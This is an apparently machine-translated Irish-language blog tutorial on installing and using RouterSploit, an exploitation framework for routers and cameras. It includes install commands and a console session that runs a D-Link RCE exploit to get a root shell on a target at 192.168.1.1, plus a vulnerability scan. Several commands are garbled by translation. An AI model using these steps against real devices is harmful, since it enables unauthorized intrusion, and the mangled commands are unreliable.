RódaireSploit – Treoir Chreat Saothraithe Críochnaithe [2020]

11.6K

RódaireSploit is creat saothraithe iontach é a dhéantar go sonrach le haghaidh feistí leabaithe.

Is féidir le pentester an uirlis seo a úsáid chun slándáil ceamaraí agus ródairí a scanadh.

Buaicphointí RouterSploit:

• Códaithe i Python.
• Comhéadan líne ordaithe.
• Tacaíocht docker.
• Uirlisí Modúlach.

OS Tacaithe:

1. MacOS.
2. Linux.
3. Fón Android.
4. Windows.

Suiteáil RouterSploit:

Riachtanais:

• todhchaí
• iarratais
• Paramach
• stad
• pycrypto

Roghnach:

• gormach – Bluetooth fuinneamh íseal

Suiteáil i Kali Linux:

Lean na horduithe thíos:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Tacaíocht Bluetooth Ísealfhuinnimh:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Suiteáil i Ubuntu:

Lean na horduithe thíos:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Tacaíocht Bluetooth Ísealfhuinnimh:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Suiteáil ar MacOS:

Lean na horduithe thíos:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Suiteáil ar Docker:

Lean na horduithe thíos:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Conas RouterSploit a Nuashonrú?

Ní mór duit RouterSploit a nuashonrú go minic chun míchaoithiúlacht a sheachaint.

Seoltar modúil nua beagnach gach lá.

cd routersploit
git pull

Conas RouterSploit a úsáid?

Úsáid

fréimhe@calidev:~/git/routersploit# ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ _ `--. _ __ | | ___ _| |_
 |    // _ \| | | | _/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 _| \____/ __,_|\____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Creat Saothraithe le haghaidh    |_|   le Bagairt9
            Gléasanna Leabaithe
  
 Cóidainm   : Bhí a fhios agam go raibh trioblóid agat
 Leagan    : 3.3.0
 Leathanach baile   : https://www.bagairt9.com/ - @bagairt
 Bígí ag Slack : routersploit.slack.com

 Glac páirt i gClár Béite Threat9 - https://www.bagairt9.com/

 Baineann leas as: 128 Scanóirí: 4 Creid: 165 cineálach: 4 Ualaí pá: 32 Ionchódóirí: 6

rsf >

Baineann leas as:

To preform the Saothrú, ach roghnaigh an modúl agus leag an sprioc:

rsf > leas a bhaint as/
shaothrú / 2wire / shaothrú / asmax / shaothrú / asus / exploits / cisco / exploits / dlink / exploits / fortinet / exploits / aitil / exploits / linksys / exploits / il / exploits / netgear /
rsf > bain úsáid as exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Chun é a chríochnú, bain úsáid as eochair cluaisín.

Chun roghanna a thaispeáint, cineálshow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > roghanna a thaispeáint

Roghanna sprioc:


   Ainm Socruithe reatha Cur síos                                
   ----       ----------------     -----------                                
   sprioc Seoladh sprice e.g. http://192.168.1.1     
   port       80                   Sprioc-phort

Úsáidrun nóexploit ordú leas a bhaint as an sprioc:

rsf (D-LINK DIR-300 & DIR-600 RCE) > rith
[+] Tá an sprioc leochaileach
[*] Lúb ordaithe á n-agairt...
cmd > céami
fréamh

Chun roghanna a shocrú:

rsf (D-LINK DIR-300 & DIR-600 RCE) > sprioc a shocrú http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Is féidir a sheiceáil an bhfuil an sprioc i mbaol dúshaothraithe ar leith:

rsf (D-LINK DIR-300 & DIR-600 RCE) > seiceáil
[+] Tá an sprioc leochaileach

Rithshow info chun eolas a thaispeáint faoin dúshaothrú.

Scanadh le haghaidh Spriocanna Leochaileacha:

Ligeann scanóirí go tapa a fhíorú an bhfuil an sprioc i mbaol aon shaothrú.

Bain úsáid as na horduithe céanna chun roghanna a thaispeáint / a shocrú, agus freisin a rith.

rsf (Scanóir D-Nasc) > rith
[+] exploits/dlink/dwr_932_info_disclosure leochaileach
[-] níl exploits/dlink/dir_300_320_615_auth_bypass leochaileach
[-] níl exploits/dlink/dsl_2750b_info_disclosure leochaileach
[-] níl exploits/dlink/dns_320l_327l_rce leochaileach
[-] níl exploits/dlink/dir_645_password_disclosure leochaileach
[-] níl exploits/dlink/dir_300_600_615_info_disclosure leochaileach
[-] níl exploits/dlink/dir_300_600_rce leochaileach

[+] Tá an gléas leochaileach!
- exploits/dlink/dwr_932_info_disclosure

Ródaire Oifigiúil

Léigh freisin: 1337x seachfhreastalaí

Focail Deiridh:

RódaireSploit is uirlis iontach é a úsáid.

Má thugann tú aghaidh ar aon cheisteanna maidir leis an RódaireSploit. Bí cinnte trácht a dhéanamh thíos. Beidh ár bhfoireann CSHAWK i dteagmháil leat chomh luath agus is féidir.